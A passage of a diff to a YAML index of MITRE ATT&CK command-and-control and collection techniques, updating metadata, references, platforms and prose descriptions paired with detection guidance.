-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       - source_name: Fortinet Agent Tesla April 2018
         description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
           Variant. Retrieved November 5, 2018.
         url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1571
     atomic_tests: []
   T1573:
@@ -38034,7 +38513,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1573
     atomic_tests: []
   T1102.002:
@@ -38059,7 +38537,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:15:47.861Z'
       name: Bidirectional Communication
       description: "Adversaries may use an existing, legitimate external Web service
         as a means for sending commands to and receiving output from a compromised
@@ -38096,8 +38574,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1573.002:
     technique:
@@ -38151,7 +38627,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1095:
     technique:
@@ -38223,33 +38698,12 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1095
     atomic_tests: []
   T1001.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
-      type: attack-pattern
-      created: '2020-03-15T00:40:27.503Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1001.003
-        url: https://attack.mitre.org/techniques/T1001/003
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
-      name: Protocol Impersonation
+      modified: '2024-10-09T15:40:19.436Z'
+      name: Protocol or Service Impersonation
       description: "Adversaries may impersonate legitimate protocols or web service
         traffic to disguise command and control activity and thwart analysis efforts.
         By impersonating legitimate protocols or web services, adversaries can make
@@ -38257,23 +38711,61 @@ command-and-control:
         \ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
         like subsequent traffic is SSL/TLS encrypted, potentially interfering with
         some security tooling, or to make the traffic look like it is related with
-        a trusted entity. "
+        a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+        impersonate expected web traffic or trusted services. For example, adversaries
+        may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+        data to disguise C2 communications or mimic legitimate services such as Gmail,
+        Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+        Malleable-C2-U42)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - James Emery-Callcott, Emerging Threats Team, Proofpoint
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
         sending significantly more data than it receives from a server). Processes
         utilizing the network that do not normally have network communication or have
         never been seen before are suspicious. Analyze packet contents to detect communications
         that do not follow the expected protocol behavior for the port that is being
         used.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+      created: '2020-03-15T00:40:27.503Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1001/003
+        external_id: T1001.003
+      - source_name: Malleable-C2-U42
+        description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+          Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+          How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+          September 24, 2024.'
+        url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      - source_name: ESET Okrum July 2019
+        description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+          RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1090.004:
     technique:
@@ -38320,7 +38812,6 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1132:
     technique:
@@ -38380,7 +38871,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.002:
     technique:
@@ -38412,7 +38902,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-14T23:39:50.117Z'
       name: Non-Standard Encoding
       description: 'Adversaries may encode data with a non-standard data encoding
         system to make the content of command and control traffic more difficult to
@@ -38438,8 +38928,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.001:
     technique:
@@ -38506,7 +38994,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.001
     atomic_tests: []
   T1105:
@@ -38604,7 +39091,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1105
     atomic_tests: []
   T1665:
@@ -38697,7 +39183,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1001.002:
     technique:
@@ -38721,7 +39206,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-15T00:37:58.963Z'
       name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
@@ -38744,8 +39229,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1001.002
     atomic_tests: []
   T1008:
@@ -38770,7 +39253,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:49:47.340Z'
       name: Fallback Channels
       description: Adversaries may use fallback or alternate communication channels
         if the primary channel is compromised or inaccessible in order to maintain
@@ -38790,8 +39273,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.001:
     technique:
@@ -38845,7 +39326,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.001
     atomic_tests: []
   T1102.001:
@@ -38870,7 +39350,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:12:30.499Z'
       name: Dead Drop Resolver
       description: |-
         Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -38896,8 +39376,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1001.001:
     technique:
@@ -38951,7 +39429,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 collection:
   T1560.001:
@@ -39027,7 +39504,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560.001
     atomic_tests: []
   T1113:
@@ -39084,7 +39560,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1113
     atomic_tests: []
   T1557:
@@ -39178,7 +39653,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.001:
     technique:
@@ -39257,7 +39731,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1602:
@@ -39296,7 +39769,7 @@ collection:
         Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
 
         Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:32:58.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data from Configuration Repository
       x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -39311,30 +39784,10 @@ collection:
       - 'Network Traffic: Network Connection Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
-      type: attack-pattern
-      created: '2020-02-14T13:35:32.938Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.002
-        url: https://attack.mitre.org/techniques/T1213/002
-      - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
-        description: Microsoft. (2017, July 19). Configure audit settings for a site
-          collection. Retrieved April 4, 2018.
-        source_name: Microsoft SharePoint Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Sharepoint
       description: |
         Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -39343,13 +39796,17 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: "The user access logging within Microsoft's SharePoint can
         be configured to report access to certain pages and documents. (Citation:
         Microsoft SharePoint Logging). As information repositories generally have
@@ -39363,20 +39820,37 @@ collection:
         of programmatic means being used to retrieve all data within the repository.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'Cloud Service: Cloud Service Metadata'
+      type: attack-pattern
+      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+      created: '2020-02-14T13:35:32.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/002
+        external_id: T1213.002
+      - source_name: Microsoft SharePoint Logging
+        description: Microsoft. (2017, July 19). Configure audit settings for a site
+          collection. Retrieved April 4, 2018.
+        url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
     atomic_tests: []
   T1123:
     technique:
-      modified: '2024-01-23T22:53:18.389Z'
+      modified: '2024-10-15T13:39:22.774Z'
       name: Audio Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -39419,7 +39893,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1123
     atomic_tests: []
   T1560.003:
@@ -39444,7 +39917,7 @@ collection:
         description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
           the Comings and Goings. Retrieved November 21, 2016.'
         source_name: ESET Sednit Part 2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T22:48:14.605Z'
       name: Archive via Custom Method
       description: 'An adversary may compress or encrypt data that is collected prior
         to exfiltration using a custom method. Adversaries may choose to use custom
@@ -39464,22 +39937,24 @@ collection:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Script: Script Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1114:
     technique:
-      modified: '2023-09-29T21:06:03.098Z'
+      modified: '2024-10-15T12:24:27.627Z'
       name: Email Collection
       description: 'Adversaries may target user email to collect sensitive information.
         Emails may contain sensitive data, including trade secrets or personal information,
-        that can prove valuable to adversaries. Adversaries can collect or forward
-        email from mail servers or clients. '
+        that can prove valuable to adversaries. Emails may also contain details of
+        ongoing incident response operations, which may allow adversaries to adjust
+        their techniques in order to maintain persistence or evade defenses.(Citation:
+        TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+        can collect or forward email from mail servers or clients. '
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -39496,11 +39971,10 @@ collection:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '2.5'
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -39516,37 +39990,28 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1114
         external_id: T1114
+      - source_name: CISA AA20-352A 2021
+        description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+          of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+          Retrieved August 30, 2024.
+        url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
       - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
         description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
           Retrieved October 8, 2019.
         url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+      - source_name: TrustedSec OOB Communications
+        description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+          Out-of-Band Communications are Essential for Incident Response. Retrieved
+          August 30, 2024.'
+        url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1025:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - William Cain
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
-      type: attack-pattern
-      created: '2017-05-31T21:30:31.584Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        url: https://attack.mitre.org/techniques/T1025
-        external_id: T1025
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:30:50.936Z'
       name: Data from Removable Media
       description: "Adversaries may search connected removable media on computers
         they have compromised to find files of interest. Sensitive data can be collected
@@ -39558,75 +40023,93 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - William Cain
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor processes and command-line arguments for actions
         that could be taken to collect files from a system's connected removable media.
         Remote access tools with built-in features may interact directly with the
         Windows API to gather data. Data may also be acquired through Windows system
         management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
         and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
       x_mitre_system_requirements:
       - Privileges to access removable media drive and files
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+      created: '2017-05-31T21:30:31.584Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1025
+        external_id: T1025
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1025
     atomic_tests: []
   T1074.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Massimiliano Romano, BT Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
-      created: '2020-03-13T21:13:10.467Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.001
-        url: https://attack.mitre.org/techniques/T1074/001
-      - source_name: Prevailion DarkWatchman 2021
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
-        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
-          new evolution in fileless techniques. Retrieved January 10, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:28:39.920Z'
+      name: 'Data Staged: Local Data Staging'
       description: |-
         Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
 
         Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Data Staged: Local Data Staging'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Massimiliano Romano, BT Security
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+      created: '2020-03-13T21:13:10.467Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/001
+        external_id: T1074.001
+      - source_name: Prevailion DarkWatchman 2021
+        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+          new evolution in fileless techniques. Retrieved January 10, 2022.'
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1074.001
     atomic_tests: []
   T1114.001:
@@ -39653,7 +40136,7 @@ collection:
         url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
         description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
           .ost). Retrieved February 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T17:59:20.983Z'
       name: 'Email Collection: Local Email Collection'
       description: |-
         Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -39677,13 +40160,11 @@ collection:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1114.001
     atomic_tests: []
   T1119:
     technique:
-      modified: '2024-01-02T13:35:57.680Z'
+      modified: '2024-09-25T20:40:07.791Z'
       name: Automated Collection
       description: "Once established within a system or network, an adversary may
         use automated techniques for collecting internal data. Methods for performing
@@ -39704,6 +40185,7 @@ collection:
         phase_name: collection
       x_mitre_contributors:
       - Praetorian
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Depending on the method used, actions could include common
         file system commands and parameters on the command-line interface within batch
@@ -39727,8 +40209,10 @@ collection:
       - Windows
       - IaaS
       - SaaS
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
+      - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Script: Script Execution'
@@ -39753,7 +40237,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1119
     atomic_tests: []
   T1115:
@@ -39820,12 +40303,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1115
     atomic_tests: []
   T1530:
     technique:
